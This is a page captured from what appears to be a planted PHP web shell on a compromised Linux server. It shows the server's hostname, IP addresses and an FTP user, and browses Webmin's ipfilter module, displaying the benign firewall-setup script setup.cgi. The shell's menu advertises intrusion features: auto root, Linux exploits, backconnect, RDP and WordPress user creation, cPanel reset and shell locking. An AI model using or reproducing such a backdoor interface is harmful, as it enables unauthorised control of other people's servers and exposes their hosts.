Linux server.thearyasamaj.org 4.18.0-553.56.1.el8_10.x86_64 #1 SMP Tue Jun 10 05:00:59 EDT 2025 x86_64
Apache
: 103.90.241.146 | : 216.73.216.158
Cant Read [ /etc/named.conf ]
5.6.40
ftpuser@mantra.thearyasamaj.org
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
usr /
libexec /
webmin /
ipfilter /
[ HOME SHELL ]
Name
Size
Permission
Action
images
[ DIR ]
drwxr-xr-x
lang
[ DIR ]
drwxr-xr-x
CHANGELOG
896
B
-rw-r--r--
apply.cgi
271
B
-rwxr-xr-x
backup_config.pl
604
B
-rwxr-xr-x
bootup.cgi
252
B
-rwxr-xr-x
cluster.cgi
2.01
KB
-rwxr-xr-x
cluster_add.cgi
1.78
KB
-rwxr-xr-x
cluster_delete.cgi
522
B
-rwxr-xr-x
config
155
B
-rw-r--r--
config-freebsd
149
B
-rw-r--r--
config-solaris-10-ALL
177
B
-rw-r--r--
config.info
669
B
-rw-r--r--
config.info.ca
717
B
-rw-r--r--
config.info.de
743
B
-rw-r--r--
config.info.nl
741
B
-rw-r--r--
convert.cgi
341
B
-rwxr-xr-x
edit_nat.cgi
7.83
KB
-rwxr-xr-x
edit_rule.cgi
9.81
KB
-rwxr-xr-x
index.cgi
8.42
KB
-rwxr-xr-x
install_check.pl
337
B
-rwxr-xr-x
ipfilter-lib.pl
39.32
KB
-rwxr-xr-x
log_parser.pl
928
B
-rwxr-xr-x
module.info
198
B
-rw-r--r--
module.info.af
0
B
-rw-r--r--
module.info.af.auto
129
B
-rw-r--r--
module.info.ar
0
B
-rw-r--r--
module.info.ar.auto
183
B
-rw-r--r--
module.info.be
0
B
-rw-r--r--
module.info.be.auto
180
B
-rw-r--r--
module.info.bg
0
B
-rw-r--r--
module.info.bg.auto
232
B
-rw-r--r--
module.info.ca
121
B
-rw-r--r--
module.info.cs
0
B
-rw-r--r--
module.info.cs.auto
121
B
-rw-r--r--
module.info.da
0
B
-rw-r--r--
module.info.da.auto
117
B
-rw-r--r--
module.info.de
97
B
-rw-r--r--
module.info.el
0
B
-rw-r--r--
module.info.el.auto
239
B
-rw-r--r--
module.info.es
0
B
-rw-r--r--
module.info.es.auto
118
B
-rw-r--r--
module.info.eu
0
B
-rw-r--r--
module.info.eu.auto
117
B
-rw-r--r--
module.info.fa
0
B
-rw-r--r--
module.info.fa.auto
182
B
-rw-r--r--
module.info.fi
0
B
-rw-r--r--
module.info.fi.auto
123
B
-rw-r--r--
module.info.fr
0
B
-rw-r--r--
module.info.fr.auto
132
B
-rw-r--r--
module.info.he
0
B
-rw-r--r--
module.info.he.auto
166
B
-rw-r--r--
module.info.hr
0
B
-rw-r--r--
module.info.hr.auto
121
B
-rw-r--r--
module.info.hu
0
B
-rw-r--r--
module.info.hu.auto
150
B
-rw-r--r--
module.info.it
0
B
-rw-r--r--
module.info.it.auto
130
B
-rw-r--r--
module.info.ja
0
B
-rw-r--r--
module.info.ja.auto
179
B
-rw-r--r--
module.info.ko
0
B
-rw-r--r--
module.info.ko.auto
140
B
-rw-r--r--
module.info.lt
0
B
-rw-r--r--
module.info.lt.auto
144
B
-rw-r--r--
module.info.lv
0
B
-rw-r--r--
module.info.lv.auto
134
B
-rw-r--r--
module.info.ms
0
B
-rw-r--r--
module.info.ms.auto
125
B
-rw-r--r--
module.info.mt
0
B
-rw-r--r--
module.info.mt.auto
123
B
-rw-r--r--
module.info.nl
26
B
-rw-r--r--
module.info.nl.auto
109
B
-rw-r--r--
module.info.no
0
B
-rw-r--r--
module.info.no.auto
126
B
-rw-r--r--
module.info.pl
0
B
-rw-r--r--
module.info.pl.auto
117
B
-rw-r--r--
module.info.pt
0
B
-rw-r--r--
module.info.pt.auto
116
B
-rw-r--r--
module.info.pt_BR
0
B
-rw-r--r--
module.info.pt_BR.auto
122
B
-rw-r--r--
module.info.ro
0
B
-rw-r--r--
module.info.ro.auto
128
B
-rw-r--r--
module.info.ru
0
B
-rw-r--r--
module.info.ru.auto
166
B
-rw-r--r--
module.info.sk
0
B
-rw-r--r--
module.info.sk.auto
126
B
-rw-r--r--
module.info.sl
0
B
-rw-r--r--
module.info.sl.auto
125
B
-rw-r--r--
module.info.sv
0
B
-rw-r--r--
module.info.sv.auto
122
B
-rw-r--r--
module.info.th
0
B
-rw-r--r--
module.info.th.auto
202
B
-rw-r--r--
module.info.tr
0
B
-rw-r--r--
module.info.tr.auto
154
B
-rw-r--r--
module.info.uk
0
B
-rw-r--r--
module.info.uk.auto
186
B
-rw-r--r--
module.info.ur
0
B
-rw-r--r--
module.info.ur.auto
198
B
-rw-r--r--
module.info.vi
0
B
-rw-r--r--
module.info.vi.auto
149
B
-rw-r--r--
module.info.zh
0
B
-rw-r--r--
module.info.zh.auto
110
B
-rw-r--r--
module.info.zh_TW
0
B
-rw-r--r--
module.info.zh_TW.auto
116
B
-rw-r--r--
move.cgi
427
B
-rwxr-xr-x
natmove.cgi
432
B
-rwxr-xr-x
save_nat.cgi
5.06
KB
-rwxr-xr-x
save_rule.cgi
4.88
KB
-rwxr-xr-x
setup.cgi
6.12
KB
-rwxr-xr-x
unapply.cgi
235
B
-rwxr-xr-x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : setup.cgi
#!/usr/bin/perl # setup.cgi # Setup an initial save file require './ipfilter-lib.pl'; &ReadParse(); @rules = ( ); if ($in{'auto'}) { $iface = $in{'iface'.$in{'auto'}}; if ($iface eq 'other') { $iface = $in{'iface'.$in{'auto'}.'_other'}; } $iface || &error($text{'setup_eiface'}); if ($in{'auto'} >= 2) { # Block all incoming traffic, except for established # connections, DNS replies and safe ICMP types # In mode 3 allow ssh and ident too # In mode 4 allow ftp, echo-request and high ports too push(@rules, { 'action' => 'skip', 'skip' => 1, 'active' => 1, 'quick' => 1, 'dir' => 'in', 'all' => 1, 'on' => $iface, 'cmt' => 'Skip next rule for external interface' }, { 'action' => 'pass', 'active' => 1, 'quick' => 1, 'dir' => 'in', 'all' => 1, 'keep' => 'state', 'cmt' => 'Allow all traffic on internal interface' }, { 'action' => 'pass', 'active' => 1, 'quick' => 1, 'dir' => 'in', 'proto' => 'udp', 'from-any' => 1, 'to-any' => 1, 'to-port-start' => 1024, 'to-port-range' => '<>', 'to-port-end' => 1024, 'keep' => 'state', 'cmt' => 'Accept responses to DNS queries' }, { 'action' => 'pass', 'active' => 1, 'quick' => 1, 'dir' => 'in', 'proto' => 'icmp', 'all' => 1, 'icmp-type' => 'echorep', 'keep' => 'state', 'cmt' => 'Accept responses to our pings' }, { 'action' => 'pass', 'active' => 1, 'quick' => 1, 'dir' => 'in', 'proto' => 'icmp', 'all' => 1, 'icmp-type' => 'unreach', 'keep' => 'state', 'cmt' => 'Accept notifications of unreachable hosts' }, { 'action' => 'pass', 'active' => 1, 'quick' => 1, 'dir' => 'in', 'proto' => 'icmp', 'all' => 1, 'icmp-type' => 'squench', 'keep' => 'state', 'cmt' => 'Accept notifications to reduce sending speed' }, { 'action' => 'pass', 'active' => 1, 'quick' => 1, 'dir' => 'in', 'proto' => 'icmp', 'all' => 1, 'icmp-type' => 'timex', 'keep' => 'state', 'cmt' => 'Accept notifications of lost packets' }, { 'action' => 'pass', 'active' => 1, 'quick' => 1, 'dir' => 'in', 'proto' => 'icmp', 'all' => 1, 'icmp-type' => 'paramprob', 'keep' => 'state', 'cmt' => 'Accept notifications of protocol problems' } ); if ($in{'auto'} >= 3) { # Allow ssh and ident push(@rules, { 'action' => 'pass', 'active' => 1, 'quick' => 1, 'dir' => 'in', 'proto' => 'tcp', 'from-any' => 1, 'to-any' => 1, 'to-port-comp' => '=', 'to-port-num' => 22, 'keep' => 'state', 'cmt' => 'Allow connections to our SSH server' }, { 'action' => 'pass', 'active' => 1, 'quick' => 1, 'dir' => 'in', 'proto' => 'tcp', 'from-any' => 1, 'to-any' => 1, 'to-port-comp' => '=', 'to-port-num' => 113, 'keep' => 'state', 'cmt' => 'Allow connections to our IDENT server' }, ); } if ($in{'auto'} == 4) { # Allow pings and most high ports push(@rules, { 'action' => 'pass', 'active' => 1, 'quick' => 1, 'dir' => 'in', 'proto' => 'icmp', 'all' => 1, 'icmp-type' => 'echo', 'keep' => 'state', 'cmt' => 'Respond to pings' }, { 'action' => 'block', 'active' => 1, 'quick' => 1, 'dir' => 'in', 'proto' => 'tcp', 'from-any' => 1, 'to-any' => 1, 'to-port-start' => 2049, 'to-port-range' => '<>', 'to-port-end' => 2050, 'keep' => 'state', 'cmt' => 'Protect our NFS server' }, { 'action' => 'block', 'active' => 1, 'quick' => 1, 'dir' => 'in', 'proto' => 'tcp', 'from-any' => 1, 'to-any' => 1, 'to-port-start' => 6000, 'to-port-range' => '<>', 'to-port-end' => 6063, 'keep' => 'state', 'cmt' => 'Protect our X11 display server' }, { 'action' => 'block', 'active' => 1, 'quick' => 1, 'dir' => 'in', 'proto' => 'tcp', 'from-any' => 1, 'to-any' => 1, 'to-port-start' => 7000, 'to-port-range' => '<>', 'to-port-end' => 7010, 'keep' => 'state', 'cmt' => 'Protect our X font server' }, { 'action' => 'pass', 'active' => 1, 'quick' => 1, 'dir' => 'in', 'proto' => 'tcp', 'from-any' => 1, 'to-any' => 1, 'to-port-start' => 1024, 'to-port-range' => '<>', 'to-port-end' => 65535, 'keep' => 'state', 'cmt' => 'Allow connections to unprivileged ports' }, ); } # Add final block rule push(@rules, { 'action' => 'block', 'active' => 1, 'all' => 1, 'dir' => 'in' }); push(@rules, { 'action' => 'pass', 'active' => 1, 'all' => 1, 'dir' => 'out' }); } else { # Just add one rule for NAT push(@natrules, { 'action' => 'map', 'active' => 1, 'fromip' => '0.0.0.0', 'frommask' => 0, 'toip' => '0.0.0.0', 'tomask' => 32, 'iface' => $iface, 'type' => 'ipnat' }); # Allow all other traffic push(@rules, { 'action' => 'pass', 'active' => 1, 'all' => 1, 'dir' => 'in' }); push(@rules, { 'action' => 'pass', 'active' => 1, 'all' => 1, 'dir' => 'out' }); } } else { # Just add rules to allow all push(@rules, { 'action' => 'pass', 'active' => 1, 'all' => 1, 'dir' => 'in' }); push(@rules, { 'action' => 'pass', 'active' => 1, 'all' => 1, 'dir' => 'out' }); } &lock_file($config{'ipf_conf'}); &save_config(\@rules); &unlock_file($config{'ipf_conf'}); &lock_file($config{'ipnatf_conf'}); &save_config(\@natrules, undef, 'ipnat'); &unlock_file($config{'ipnatf_conf'}); ©_to_cluster(); if ($in{'atboot'}) { &create_firewall_init(); } &webmin_log("setup"); &redirect("");
Close